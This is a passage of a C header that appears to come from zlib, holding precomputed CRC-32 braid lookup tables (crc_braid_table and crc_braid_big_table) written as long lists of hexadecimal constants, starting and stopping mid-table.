0x28a91e5800000000, 0x5f9e066900000000, 0x78fb23e800000000, 0x50523db000000000, 0x7737183100000000, 0xbe3c0dd200000000, 0x9959285300000000, 0xb1f0360b00000000, 0x9695138a00000000, 0xe1a20bbb00000000, 0xc6c72e3a00000000, 0xee6e306200000000, 0xc90b15e300000000, 0x3d7f6b7f00000000, 0x1a1a4efe00000000, 0x32b350a600000000, 0x15d6752700000000, 0x62e16d1600000000, 0x4584489700000000, 0x6d2d56cf00000000, 0x4a48734e00000000, 0x834366ad00000000, 0xa426432c00000000, 0x8c8f5d7400000000, 0xabea78f500000000, 0xdcdd60c400000000, 0xfbb8454500000000, 0xd3115b1d00000000, 0xf4747e9c00000000, 0x7afed6fe00000000, 0x5d9bf37f00000000, 0x7532ed2700000000, 0x5257c8a600000000, 0x2560d09700000000, 0x0205f51600000000, 0x2aaceb4e00000000, 0x0dc9cecf00000000, 0xc4c2db2c00000000, 0xe3a7fead00000000, 0xcb0ee0f500000000, 0xec6bc57400000000, 0x9b5cdd4500000000, 0xbc39f8c400000000, 0x9490e69c00000000, 0xb3f5c31d00000000, 0x4781bd8100000000, 0x60e4980000000000, 0x484d865800000000, 0x6f28a3d900000000, 0x181fbbe800000000, 0x3f7a9e6900000000, 0x17d3803100000000, 0x30b6a5b000000000, 0xf9bdb05300000000, 0xded895d200000000, 0xf6718b8a00000000, 0xd114ae0b00000000, 0xa623b63a00000000, 0x814693bb00000000, 0xa9ef8de300000000, 0x8e8aa86200000000, 0xb5fadc2600000000, 0x929ff9a700000000, 0xba36e7ff00000000, 0x9d53c27e00000000, 0xea64da4f00000000, 0xcd01ffce00000000, 0xe5a8e19600000000, 0xc2cdc41700000000, 0x0bc6d1f400000000, 0x2ca3f47500000000, 0x040aea2d00000000, 0x236fcfac00000000, 0x5458d79d00000000, 0x733df21c00000000, 0x5b94ec4400000000, 0x7cf1c9c500000000, 0x8885b75900000000, 0xafe092d800000000, 0x87498c8000000000, 0xa02ca90100000000, 0xd71bb13000000000, 0xf07e94b100000000, 0xd8d78ae900000000, 0xffb2af6800000000, 0x36b9ba8b00000000, 0x11dc9f0a00000000, 0x3975815200000000, 0x1e10a4d300000000, 0x6927bce200000000, 0x4e42996300000000, 0x66eb873b00000000, 0x418ea2ba00000000, 0xcf040ad800000000, 0xe8612f5900000000, 0xc0c8310100000000, 0xe7ad148000000000, 0x909a0cb100000000, 0xb7ff293000000000, 0x9f56376800000000, 
0xb83312e900000000, 0x7138070a00000000, 0x565d228b00000000, 0x7ef43cd300000000, 0x5991195200000000, 0x2ea6016300000000, 0x09c324e200000000, 0x216a3aba00000000, 0x060f1f3b00000000, 0xf27b61a700000000, 0xd51e442600000000, 0xfdb75a7e00000000, 0xdad27fff00000000, 0xade567ce00000000, 0x8a80424f00000000, 0xa2295c1700000000, 0x854c799600000000, 0x4c476c7500000000, 0x6b2249f400000000, 0x438b57ac00000000, 0x64ee722d00000000, 0x13d96a1c00000000, 0x34bc4f9d00000000, 0x1c1551c500000000, 0x3b70744400000000, 0x6af5b94d00000000, 0x4d909ccc00000000, 0x6539829400000000, 0x425ca71500000000, 0x356bbf2400000000, 0x120e9aa500000000, 0x3aa784fd00000000, 0x1dc2a17c00000000, 0xd4c9b49f00000000, 0xf3ac911e00000000, 0xdb058f4600000000, 0xfc60aac700000000, 0x8b57b2f600000000, 0xac32977700000000, 0x849b892f00000000, 0xa3feacae00000000, 0x578ad23200000000, 0x70eff7b300000000, 0x5846e9eb00000000, 0x7f23cc6a00000000, 0x0814d45b00000000, 0x2f71f1da00000000, 0x07d8ef8200000000, 0x20bdca0300000000, 0xe9b6dfe000000000, 0xced3fa6100000000, 0xe67ae43900000000, 0xc11fc1b800000000, 0xb628d98900000000, 0x914dfc0800000000, 0xb9e4e25000000000, 0x9e81c7d100000000, 0x100b6fb300000000, 0x376e4a3200000000, 0x1fc7546a00000000, 0x38a271eb00000000, 0x4f9569da00000000, 0x68f04c5b00000000, 0x4059520300000000, 0x673c778200000000, 0xae37626100000000, 0x895247e000000000, 0xa1fb59b800000000, 0x869e7c3900000000, 0xf1a9640800000000, 0xd6cc418900000000, 0xfe655fd100000000, 0xd9007a5000000000, 0x2d7404cc00000000, 0x0a11214d00000000, 0x22b83f1500000000, 0x05dd1a9400000000, 0x72ea02a500000000, 0x558f272400000000, 0x7d26397c00000000, 0x5a431cfd00000000, 0x9348091e00000000, 0xb42d2c9f00000000, 0x9c8432c700000000, 0xbbe1174600000000, 0xccd60f7700000000, 0xebb32af600000000, 0xc31a34ae00000000, 0xe47f112f00000000, 0xdf0f656b00000000, 0xf86a40ea00000000, 0xd0c35eb200000000, 0xf7a67b3300000000, 0x8091630200000000, 0xa7f4468300000000, 0x8f5d58db00000000, 0xa8387d5a00000000, 0x613368b900000000, 0x46564d3800000000, 0x6eff536000000000, 
0x499a76e100000000, 0x3ead6ed000000000, 0x19c84b5100000000, 0x3161550900000000, 0x1604708800000000, 0xe2700e1400000000, 0xc5152b9500000000, 0xedbc35cd00000000, 0xcad9104c00000000, 0xbdee087d00000000, 0x9a8b2dfc00000000, 0xb22233a400000000, 0x9547162500000000, 0x5c4c03c600000000, 0x7b29264700000000, 0x5380381f00000000, 0x74e51d9e00000000, 0x03d205af00000000, 0x24b7202e00000000, 0x0c1e3e7600000000, 0x2b7b1bf700000000, 0xa5f1b39500000000, 0x8294961400000000, 0xaa3d884c00000000, 0x8d58adcd00000000, 0xfa6fb5fc00000000, 0xdd0a907d00000000, 0xf5a38e2500000000, 0xd2c6aba400000000, 0x1bcdbe4700000000, 0x3ca89bc600000000, 0x1401859e00000000, 0x3364a01f00000000, 0x4453b82e00000000, 0x63369daf00000000, 0x4b9f83f700000000, 0x6cfaa67600000000, 0x988ed8ea00000000, 0xbfebfd6b00000000, 0x9742e33300000000, 0xb027c6b200000000, 0xc710de8300000000, 0xe075fb0200000000, 0xc8dce55a00000000, 0xefb9c0db00000000, 0x26b2d53800000000, 0x01d7f0b900000000, 0x297eeee100000000, 0x0e1bcb6000000000, 0x792cd35100000000, 0x5e49f6d000000000, 0x76e0e88800000000, 0x5185cd0900000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x9ba54c6f, 0xec3b9e9f, 0x779ed2f0, 0x03063b7f, 0x98a37710, 0xef3da5e0, 0x7498e98f, 0x060c76fe, 0x9da93a91, 0xea37e861, 0x7192a40e, 0x050a4d81, 0x9eaf01ee, 0xe931d31e, 0x72949f71, 0x0c18edfc, 0x97bda193, 0xe0237363, 0x7b863f0c, 0x0f1ed683, 0x94bb9aec, 0xe325481c, 0x78800473, 0x0a149b02, 0x91b1d76d, 0xe62f059d, 0x7d8a49f2, 0x0912a07d, 0x92b7ec12, 0xe5293ee2, 0x7e8c728d, 0x1831dbf8, 0x83949797, 0xf40a4567, 0x6faf0908, 0x1b37e087, 0x8092ace8, 0xf70c7e18, 0x6ca93277, 0x1e3dad06, 0x8598e169, 0xf2063399, 0x69a37ff6, 0x1d3b9679, 0x869eda16, 0xf10008e6, 0x6aa54489, 0x14293604, 0x8f8c7a6b, 0xf812a89b, 0x63b7e4f4, 0x172f0d7b, 0x8c8a4114, 0xfb1493e4, 0x60b1df8b, 0x122540fa, 0x89800c95, 0xfe1ede65, 0x65bb920a, 0x11237b85, 0x8a8637ea, 0xfd18e51a, 0x66bda975, 0x3063b7f0, 0xabc6fb9f, 0xdc58296f, 0x47fd6500, 0x33658c8f, 0xa8c0c0e0, 0xdf5e1210, 0x44fb5e7f, 
0x366fc10e, 0xadca8d61, 0xda545f91, 0x41f113fe, 0x3569fa71, 0xaeccb61e, 0xd95264ee, 0x42f72881, 0x3c7b5a0c, 0xa7de1663, 0xd040c493, 0x4be588fc, 0x3f7d6173, 0xa4d82d1c, 0xd346ffec, 0x48e3b383, 0x3a772cf2, 0xa1d2609d, 0xd64cb26d, 0x4de9fe02, 0x3971178d, 0xa2d45be2, 0xd54a8912, 0x4eefc57d, 0x28526c08, 0xb3f72067, 0xc469f297, 0x5fccbef8, 0x2b545777, 0xb0f11b18, 0xc76fc9e8, 0x5cca8587, 0x2e5e1af6, 0xb5fb5699, 0xc2658469, 0x59c0c806, 0x2d582189, 0xb6fd6de6, 0xc163bf16, 0x5ac6f379, 0x244a81f4, 0xbfefcd9b, 0xc8711f6b, 0x53d45304, 0x274cba8b, 0xbce9f6e4, 0xcb772414, 0x50d2687b, 0x2246f70a, 0xb9e3bb65, 0xce7d6995, 0x55d825fa, 0x2140cc75, 0xbae5801a, 0xcd7b52ea, 0x56de1e85, 0x60c76fe0, 0xfb62238f, 0x8cfcf17f, 0x1759bd10, 0x63c1549f, 0xf86418f0, 0x8ffaca00, 0x145f866f, 0x66cb191e, 0xfd6e5571, 0x8af08781, 0x1155cbee, 0x65cd2261, 0xfe686e0e, 0x89f6bcfe, 0x1253f091, 0x6cdf821c, 0xf77ace73, 0x80e41c83, 0x1b4150ec, 0x6fd9b963, 0xf47cf50c, 0x83e227fc, 0x18476b93, 0x6ad3f4e2, 0xf176b88d, 0x86e86a7d, 0x1d4d2612, 0x69d5cf9d, 0xf27083f2, 0x85ee5102, 0x1e4b1d6d, 0x78f6b418, 0xe353f877, 0x94cd2a87, 0x0f6866e8, 0x7bf08f67, 0xe055c308, 0x97cb11f8, 0x0c6e5d97, 0x7efac2e6, 0xe55f8e89, 0x92c15c79, 0x09641016, 0x7dfcf999, 0xe659b5f6, 0x91c76706, 0x0a622b69, 0x74ee59e4, 0xef4b158b, 0x98d5c77b, 0x03708b14, 0x77e8629b, 0xec4d2ef4, 0x9bd3fc04, 0x0076b06b, 0x72e22f1a, 0xe9476375, 0x9ed9b185, 0x057cfdea, 0x71e41465, 0xea41580a, 0x9ddf8afa, 0x067ac695, 0x50a4d810, 0xcb01947f, 0xbc9f468f, 0x273a0ae0, 0x53a2e36f, 0xc807af00, 0xbf997df0, 0x243c319f, 0x56a8aeee, 0xcd0de281, 0xba933071, 0x21367c1e, 0x55ae9591, 0xce0bd9fe, 0xb9950b0e, 0x22304761, 0x5cbc35ec, 0xc7197983, 0xb087ab73, 0x2b22e71c, 0x5fba0e93, 0xc41f42fc, 0xb381900c, 0x2824dc63, 0x5ab04312, 0xc1150f7d, 0xb68bdd8d, 0x2d2e91e2, 0x59b6786d, 0xc2133402, 0xb58de6f2, 0x2e28aa9d, 0x489503e8, 0xd3304f87, 0xa4ae9d77, 0x3f0bd118, 0x4b933897, 0xd03674f8, 0xa7a8a608, 0x3c0dea67, 0x4e997516, 0xd53c3979, 0xa2a2eb89, 0x3907a7e6, 0x4d9f4e69, 0xd63a0206, 
0xa1a4d0f6, 0x3a019c99, 0x448dee14, 0xdf28a27b, 0xa8b6708b, 0x33133ce4, 0x478bd56b, 0xdc2e9904, 0xabb04bf4, 0x3015079b, 0x428198ea, 0xd924d485, 0xaeba0675, 0x351f4a1a, 0x4187a395, 0xda22effa, 0xadbc3d0a, 0x36197165}, {0x00000000, 0xc18edfc0, 0x586cb9c1, 0x99e26601, 0xb0d97382, 0x7157ac42, 0xe8b5ca43, 0x293b1583, 0xbac3e145, 0x7b4d3e85, 0xe2af5884, 0x23218744, 0x0a1a92c7, 0xcb944d07, 0x52762b06, 0x93f8f4c6, 0xaef6c4cb, 0x6f781b0b, 0xf69a7d0a, 0x3714a2ca, 0x1e2fb749, 0xdfa16889, 0x46430e88, 0x87cdd148, 0x1435258e, 0xd5bbfa4e, 0x4c599c4f, 0x8dd7438f, 0xa4ec560c, 0x656289cc, 0xfc80efcd, 0x3d0e300d, 0x869c8fd7, 0x47125017, 0xdef03616, 0x1f7ee9d6, 0x3645fc55, 0xf7cb2395, 0x6e294594, 0xafa79a54, 0x3c5f6e92, 0xfdd1b152, 0x6433d753, 0xa5bd0893, 0x8c861d10, 0x4d08c2d0, 0xd4eaa4d1, 0x15647b11, 0x286a4b1c, 0xe9e494dc, 0x7006f2dd, 0xb1882d1d, 0x98b3389e, 0x593de75e, 0xc0df815f, 0x01515e9f, 0x92a9aa59, 0x53277599, 0xcac51398, 0x0b4bcc58, 0x2270d9db, 0xe3fe061b, 0x7a1c601a, 0xbb92bfda, 0xd64819ef, 0x17c6c62f, 0x8e24a02e, 0x4faa7fee, 0x66916a6d, 0xa71fb5ad, 0x3efdd3ac, 0xff730c6c, 0x6c8bf8aa, 0xad05276a, 0x34e7416b, 0xf5699eab, 0xdc528b28, 0x1ddc54e8, 0x843e32e9, 0x45b0ed29, 0x78bedd24, 0xb93002e4, 0x20d264e5, 0xe15cbb25, 0xc867aea6, 0x09e97166, 0x900b1767, 0x5185c8a7, 0xc27d3c61, 0x03f3e3a1, 0x9a1185a0, 0x5b9f5a60, 0x72a44fe3, 0xb32a9023, 0x2ac8f622, 0xeb4629e2, 0x50d49638, 0x915a49f8, 0x08b82ff9, 0xc936f039, 0xe00de5ba, 0x21833a7a, 0xb8615c7b, 0x79ef83bb, 0xea17777d, 0x2b99a8bd, 0xb27bcebc, 0x73f5117c, 0x5ace04ff, 0x9b40db3f, 0x02a2bd3e, 0xc32c62fe, 0xfe2252f3, 0x3fac8d33, 0xa64eeb32, 0x67c034f2, 0x4efb2171, 0x8f75feb1, 0x169798b0, 0xd7194770, 0x44e1b3b6, 0x856f6c76, 0x1c8d0a77, 0xdd03d5b7, 0xf438c034, 0x35b61ff4, 0xac5479f5, 0x6ddaa635, 0x77e1359f, 0xb66fea5f, 0x2f8d8c5e, 0xee03539e, 0xc738461d, 0x06b699dd, 0x9f54ffdc, 0x5eda201c, 0xcd22d4da, 0x0cac0b1a, 0x954e6d1b, 0x54c0b2db, 0x7dfba758, 0xbc757898, 0x25971e99, 0xe419c159, 0xd917f154, 0x18992e94, 0x817b4895, 0x40f59755, 
0x69ce82d6, 0xa8405d16, 0x31a23b17, 0xf02ce4d7, 0x63d41011, 0xa25acfd1, 0x3bb8a9d0, 0xfa367610, 0xd30d6393, 0x1283bc53, 0x8b61da52, 0x4aef0592, 0xf17dba48, 0x30f36588, 0xa9110389, 0x689fdc49, 0x41a4c9ca, 0x802a160a, 0x19c8700b, 0xd846afcb, 0x4bbe5b0d, 0x8a3084cd, 0x13d2e2cc, 0xd25c3d0c, 0xfb67288f, 0x3ae9f74f, 0xa30b914e, 0x62854e8e, 0x5f8b7e83, 0x9e05a143, 0x07e7c742, 0xc6691882, 0xef520d01, 0x2edcd2c1, 0xb73eb4c0, 0x76b06b00, 0xe5489fc6, 0x24c64006, 0xbd242607, 0x7caaf9c7, 0x5591ec44, 0x941f3384, 0x0dfd5585, 0xcc738a45, 0xa1a92c70, 0x6027f3b0, 0xf9c595b1, 0x384b4a71, 0x11705ff2, 0xd0fe8032, 0x491ce633, 0x889239f3, 0x1b6acd35, 0xdae412f5, 0x430674f4, 0x8288ab34, 0xabb3beb7, 0x6a3d6177, 0xf3df0776, 0x3251d8b6, 0x0f5fe8bb, 0xced1377b, 0x5733517a, 0x96bd8eba, 0xbf869b39, 0x7e0844f9, 0xe7ea22f8, 0x2664fd38, 0xb59c09fe, 0x7412d63e, 0xedf0b03f, 0x2c7e6fff, 0x05457a7c, 0xc4cba5bc, 0x5d29c3bd, 0x9ca71c7d, 0x2735a3a7, 0xe6bb7c67, 0x7f591a66, 0xbed7c5a6, 0x97ecd025, 0x56620fe5, 0xcf8069e4, 0x0e0eb624, 0x9df642e2, 0x5c789d22, 0xc59afb23, 0x041424e3, 0x2d2f3160, 0xeca1eea0, 0x754388a1, 0xb4cd5761, 0x89c3676c, 0x484db8ac, 0xd1afdead, 0x1021016d, 0x391a14ee, 0xf894cb2e, 0x6176ad2f, 0xa0f872ef, 0x33008629, 0xf28e59e9, 0x6b6c3fe8, 0xaae2e028, 0x83d9f5ab, 0x42572a6b, 0xdbb54c6a, 0x1a3b93aa}, {0x00000000, 0xefc26b3e, 0x04f5d03d, 0xeb37bb03, 0x09eba07a, 0xe629cb44, 0x0d1e7047, 0xe2dc1b79, 0x13d740f4, 0xfc152bca, 0x172290c9, 0xf8e0fbf7, 0x1a3ce08e, 0xf5fe8bb0, 0x1ec930b3, 0xf10b5b8d, 0x27ae81e8, 0xc86cead6, 0x235b51d5, 0xcc993aeb, 0x2e452192, 0xc1874aac, 0x2ab0f1af, 0xc5729a91, 0x3479c11c, 0xdbbbaa22, 0x308c1121, 0xdf4e7a1f, 0x3d926166, 0xd2500a58, 0x3967b15b, 0xd6a5da65, 0x4f5d03d0, 0xa09f68ee, 0x4ba8d3ed, 0xa46ab8d3, 0x46b6a3aa, 0xa974c894, 0x42437397, 0xad8118a9, 0x5c8a4324, 0xb348281a, 0x587f9319, 0xb7bdf827, 0x5561e35e, 0xbaa38860, 0x51943363, 0xbe56585d, 0x68f38238, 0x8731e906, 0x6c065205, 0x83c4393b, 0x61182242, 0x8eda497c, 0x65edf27f, 0x8a2f9941, 0x7b24c2cc, 0x94e6a9f2, 
0x7fd112f1, 0x901379cf, 0x72cf62b6, 0x9d0d0988, 0x763ab28b, 0x99f8d9b5, 0x9eba07a0, 0x71786c9e, 0x9a4fd79d, 0x758dbca3, 0x9751a7da, 0x7893cce4, 0x93a477e7, 0x7c661cd9, 0x8d6d4754, 0x62af2c6a, 0x89989769, 0x665afc57, 0x8486e72e, 0x6b448c10, 0x80733713, 0x6fb15c2d, 0xb9148648, 0x56d6ed76, 0xbde15675, 0x52233d4b, 0xb0ff2632, 0x5f3d4d0c, 0xb40af60f, 0x5bc89d31, 0xaac3c6bc, 0x4501ad82, 0xae361681, 0x41f47dbf, 0xa32866c6, 0x4cea0df8, 0xa7ddb6fb, 0x481fddc5, 0xd1e70470, 0x3e256f4e, 0xd512d44d, 0x3ad0bf73, 0xd80ca40a, 0x37cecf34, 0xdcf97437, 0x333b1f09, 0xc2304484, 0x2df22fba, 0xc6c594b9, 0x2907ff87, 0xcbdbe4fe, 0x24198fc0, 0xcf2e34c3, 0x20ec5ffd, 0xf6498598, 0x198beea6, 0xf2bc55a5, 0x1d7e3e9b, 0xffa225e2, 0x10604edc, 0xfb57f5df, 0x14959ee1, 0xe59ec56c, 0x0a5cae52, 0xe16b1551, 0x0ea97e6f, 0xec756516, 0x03b70e28, 0xe880b52b, 0x0742de15, 0xe6050901, 0x09c7623f, 0xe2f0d93c, 0x0d32b202, 0xefeea97b, 0x002cc245, 0xeb1b7946, 0x04d91278, 0xf5d249f5, 0x1a1022cb, 0xf12799c8, 0x1ee5f2f6, 0xfc39e98f, 0x13fb82b1, 0xf8cc39b2, 0x170e528c, 0xc1ab88e9, 0x2e69e3d7, 0xc55e58d4, 0x2a9c33ea, 0xc8402893, 0x278243ad, 0xccb5f8ae, 0x23779390, 0xd27cc81d, 0x3dbea323, 0xd6891820, 0x394b731e, 0xdb976867, 0x34550359, 0xdf62b85a, 0x30a0d364, 0xa9580ad1, 0x469a61ef, 0xadaddaec, 0x426fb1d2, 0xa0b3aaab, 0x4f71c195, 0xa4467a96, 0x4b8411a8, 0xba8f4a25, 0x554d211b, 0xbe7a9a18, 0x51b8f126, 0xb364ea5f, 0x5ca68161, 0xb7913a62, 0x5853515c, 0x8ef68b39, 0x6134e007, 0x8a035b04, 0x65c1303a, 0x871d2b43, 0x68df407d, 0x83e8fb7e, 0x6c2a9040, 0x9d21cbcd, 0x72e3a0f3, 0x99d41bf0, 0x761670ce, 0x94ca6bb7, 0x7b080089, 0x903fbb8a, 0x7ffdd0b4, 0x78bf0ea1, 0x977d659f, 0x7c4ade9c, 0x9388b5a2, 0x7154aedb, 0x9e96c5e5, 0x75a17ee6, 0x9a6315d8, 0x6b684e55, 0x84aa256b, 0x6f9d9e68, 0x805ff556, 0x6283ee2f, 0x8d418511, 0x66763e12, 0x89b4552c, 0x5f118f49, 0xb0d3e477, 0x5be45f74, 0xb426344a, 0x56fa2f33, 0xb938440d, 0x520fff0e, 0xbdcd9430, 0x4cc6cfbd, 0xa304a483, 0x48331f80, 0xa7f174be, 0x452d6fc7, 0xaaef04f9, 0x41d8bffa, 0xae1ad4c4, 
0x37e20d71, 0xd820664f, 0x3317dd4c, 0xdcd5b672, 0x3e09ad0b, 0xd1cbc635, 0x3afc7d36, 0xd53e1608, 0x24354d85, 0xcbf726bb, 0x20c09db8, 0xcf02f686, 0x2ddeedff, 0xc21c86c1, 0x292b3dc2, 0xc6e956fc, 0x104c8c99, 0xff8ee7a7, 0x14b95ca4, 0xfb7b379a, 0x19a72ce3, 0xf66547dd, 0x1d52fcde, 0xf29097e0, 0x039bcc6d, 0xec59a753, 0x076e1c50, 0xe8ac776e, 0x0a706c17, 0xe5b20729, 0x0e85bc2a, 0xe147d714}, {0x00000000, 0x177b1443, 0x2ef62886, 0x398d3cc5, 0x5dec510c, 0x4a97454f, 0x731a798a, 0x64616dc9, 0xbbd8a218, 0xaca3b65b, 0x952e8a9e, 0x82559edd, 0xe634f314, 0xf14fe757, 0xc8c2db92, 0xdfb9cfd1, 0xacc04271, 0xbbbb5632, 0x82366af7, 0x954d7eb4, 0xf12c137d, 0xe657073e, 0xdfda3bfb, 0xc8a12fb8, 0x1718e069, 0x0063f42a, 0x39eec8ef, 0x2e95dcac, 0x4af4b165, 0x5d8fa526, 0x640299e3, 0x73798da0, 0x82f182a3, 0x958a96e0, 0xac07aa25, 0xbb7cbe66, 0xdf1dd3af, 0xc866c7ec, 0xf1ebfb29, 0xe690ef6a, 0x392920bb, 0x2e5234f8, 0x17df083d, 0x00a41c7e, 0x64c571b7, 0x73be65f4, 0x4a335931, 0x5d484d72, 0x2e31c0d2, 0x394ad491, 0x00c7e854, 0x17bcfc17, 0x73dd91de, 0x64a6859d, 0x5d2bb958, 0x4a50ad1b, 0x95e962ca, 0x82927689, 0xbb1f4a4c, 0xac645e0f, 0xc80533c6, 0xdf7e2785, 0xe6f31b40, 0xf1880f03, 0xde920307, 0xc9e91744, 0xf0642b81, 0xe71f3fc2, 0x837e520b, 0x94054648, 0xad887a8d, 0xbaf36ece, 0x654aa11f, 0x7231b55c, 0x4bbc8999, 0x5cc79dda, 0x38a6f013, 0x2fdde450, 0x1650d895, 0x012bccd6, 0x72524176, 0x65295535, 0x5ca469f0, 0x4bdf7db3, 0x2fbe107a, 0x38c50439, 0x014838fc, 0x16332cbf, 0xc98ae36e, 0xdef1f72d, 0xe77ccbe8, 0xf007dfab, 0x9466b262, 0x831da621, 0xba909ae4, 0xadeb8ea7, 0x5c6381a4, 0x4b1895e7, 0x7295a922, 0x65eebd61, 0x018fd0a8, 0x16f4c4eb, 0x2f79f82e, 0x3802ec6d, 0xe7bb23bc, 0xf0c037ff, 0xc94d0b3a, 0xde361f79, 0xba5772b0, 0xad2c66f3, 0x94a15a36, 0x83da4e75, 0xf0a3c3d5, 0xe7d8d796, 0xde55eb53, 0xc92eff10, 0xad4f92d9, 0xba34869a, 0x83b9ba5f, 0x94c2ae1c, 0x4b7b61cd, 0x5c00758e, 0x658d494b, 0x72f65d08, 0x169730c1, 0x01ec2482, 0x38611847, 0x2f1a0c04, 0x6655004f, 0x712e140c, 0x48a328c9, 0x5fd83c8a, 0x3bb95143, 0x2cc24500, 
0x154f79c5, 0x02346d86, 0xdd8da257, 0xcaf6b614, 0xf37b8ad1, 0xe4009e92, 0x8061f35b, 0x971ae718, 0xae97dbdd, 0xb9eccf9e, 0xca95423e, 0xddee567d, 0xe4636ab8, 0xf3187efb, 0x97791332, 0x80020771, 0xb98f3bb4, 0xaef42ff7, 0x714de026, 0x6636f465, 0x5fbbc8a0, 0x48c0dce3, 0x2ca1b12a, 0x3bdaa569, 0x025799ac, 0x152c8def, 0xe4a482ec, 0xf3df96af, 0xca52aa6a, 0xdd29be29, 0xb948d3e0, 0xae33c7a3, 0x97befb66, 0x80c5ef25, 0x5f7c20f4, 0x480734b7, 0x718a0872, 0x66f11c31, 0x029071f8, 0x15eb65bb, 0x2c66597e, 0x3b1d4d3d, 0x4864c09d, 0x5f1fd4de, 0x6692e81b, 0x71e9fc58, 0x15889191, 0x02f385d2, 0x3b7eb917, 0x2c05ad54, 0xf3bc6285, 0xe4c776c6, 0xdd4a4a03, 0xca315e40, 0xae503389, 0xb92b27ca, 0x80a61b0f, 0x97dd0f4c, 0xb8c70348, 0xafbc170b, 0x96312bce, 0x814a3f8d, 0xe52b5244, 0xf2504607, 0xcbdd7ac2, 0xdca66e81, 0x031fa150, 0x1464b513, 0x2de989d6, 0x3a929d95, 0x5ef3f05c, 0x4988e41f, 0x7005d8da, 0x677ecc99, 0x14074139, 0x037c557a, 0x3af169bf, 0x2d8a7dfc, 0x49eb1035, 0x5e900476, 0x671d38b3, 0x70662cf0, 0xafdfe321, 0xb8a4f762, 0x8129cba7, 0x9652dfe4, 0xf233b22d, 0xe548a66e, 0xdcc59aab, 0xcbbe8ee8, 0x3a3681eb, 0x2d4d95a8, 0x14c0a96d, 0x03bbbd2e, 0x67dad0e7, 0x70a1c4a4, 0x492cf861, 0x5e57ec22, 0x81ee23f3, 0x969537b0, 0xaf180b75, 0xb8631f36, 0xdc0272ff, 0xcb7966bc, 0xf2f45a79, 0xe58f4e3a, 0x96f6c39a, 0x818dd7d9, 0xb800eb1c, 0xaf7bff5f, 0xcb1a9296, 0xdc6186d5, 0xe5ecba10, 0xf297ae53, 0x2d2e6182, 0x3a5575c1, 0x03d84904, 0x14a35d47, 0x70c2308e, 0x67b924cd, 0x5e341808, 0x494f0c4b}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x43147b17, 0x8628f62e, 0xc53c8d39, 0x0c51ec5d, 0x4f45974a, 0x8a791a73, 0xc96d6164, 0x18a2d8bb, 0x5bb6a3ac, 0x9e8a2e95, 0xdd9e5582, 0x14f334e6, 0x57e74ff1, 0x92dbc2c8, 0xd1cfb9df, 0x7142c0ac, 0x3256bbbb, 0xf76a3682, 0xb47e4d95, 0x7d132cf1, 0x3e0757e6, 0xfb3bdadf, 0xb82fa1c8, 0x69e01817, 0x2af46300, 0xefc8ee39, 0xacdc952e, 0x65b1f44a, 0x26a58f5d, 0xe3990264, 0xa08d7973, 0xa382f182, 0xe0968a95, 0x25aa07ac, 0x66be7cbb, 0xafd31ddf, 0xecc766c8, 0x29fbebf1, 
0x6aef90e6, 0xbb202939, 0xf834522e, 0x3d08df17, 0x7e1ca400, 0xb771c564, 0xf465be73, 0x3159334a, 0x724d485d, 0xd2c0312e, 0x91d44a39, 0x54e8c700, 0x17fcbc17, 0xde91dd73, 0x9d85a664, 0x58b92b5d, 0x1bad504a, 0xca62e995, 0x89769282, 0x4c4a1fbb, 0x0f5e64ac, 0xc63305c8, 0x85277edf, 0x401bf3e6, 0x030f88f1, 0x070392de, 0x4417e9c9, 0x812b64f0, 0xc23f1fe7, 0x0b527e83, 0x48460594, 0x8d7a88ad, 0xce6ef3ba, 0x1fa14a65, 0x5cb53172, 0x9989bc4b, 0xda9dc75c, 0x13f0a638, 0x50e4dd2f, 0x95d85016, 0xd6cc2b01, 0x76415272, 0x35552965, 0xf069a45c, 0xb37ddf4b, 0x7a10be2f, 0x3904c538, 0xfc384801, 0xbf2c3316, 0x6ee38ac9, 0x2df7f1de, 0xe8cb7ce7, 0xabdf07f0, 0x62b26694, 0x21a61d83, 0xe49a90ba, 0xa78eebad, 0xa481635c, 0xe795184b, 0x22a99572, 0x61bdee65, 0xa8d08f01, 0xebc4f416, 0x2ef8792f, 0x6dec0238, 0xbc23bbe7, 0xff37c0f0, 0x3a0b4dc9, 0x791f36de, 0xb07257ba, 0xf3662cad, 0x365aa194, 0x754eda83, 0xd5c3a3f0, 0x96d7d8e7, 0x53eb55de, 0x10ff2ec9, 0xd9924fad, 0x9a8634ba, 0x5fbab983, 0x1caec294, 0xcd617b4b, 0x8e75005c, 0x4b498d65, 0x085df672, 0xc1309716, 0x8224ec01, 0x47186138, 0x040c1a2f, 0x4f005566, 0x0c142e71, 0xc928a348, 0x8a3cd85f, 0x4351b93b, 0x0045c22c, 0xc5794f15, 0x866d3402, 0x57a28ddd, 0x14b6f6ca, 0xd18a7bf3, 0x929e00e4, 0x5bf36180, 0x18e71a97, 0xdddb97ae, 0x9ecfecb9, 0x3e4295ca, 0x7d56eedd, 0xb86a63e4, 0xfb7e18f3, 0x32137997, 0x71070280, 0xb43b8fb9, 0xf72ff4ae, 0x26e04d71, 0x65f43666, 0xa0c8bb5f, 0xe3dcc048, 0x2ab1a12c, 0x69a5da3b, 0xac995702, 0xef8d2c15, 0xec82a4e4, 0xaf96dff3, 0x6aaa52ca, 0x29be29dd, 0xe0d348b9, 0xa3c733ae, 0x66fbbe97, 0x25efc580, 0xf4207c5f, 0xb7340748, 0x72088a71, 0x311cf166, 0xf8719002, 0xbb65eb15, 0x7e59662c, 0x3d4d1d3b, 0x9dc06448, 0xded41f5f, 0x1be89266, 0x58fce971, 0x91918815, 0xd285f302, 0x17b97e3b, 0x54ad052c, 0x8562bcf3, 0xc676c7e4, 0x034a4add, 0x405e31ca, 0x893350ae, 0xca272bb9, 0x0f1ba680, 0x4c0fdd97, 0x4803c7b8, 0x0b17bcaf, 0xce2b3196, 0x8d3f4a81, 0x44522be5, 0x074650f2, 0xc27addcb, 0x816ea6dc, 0x50a11f03, 0x13b56414, 0xd689e92d, 0x959d923a, 0x5cf0f35e, 
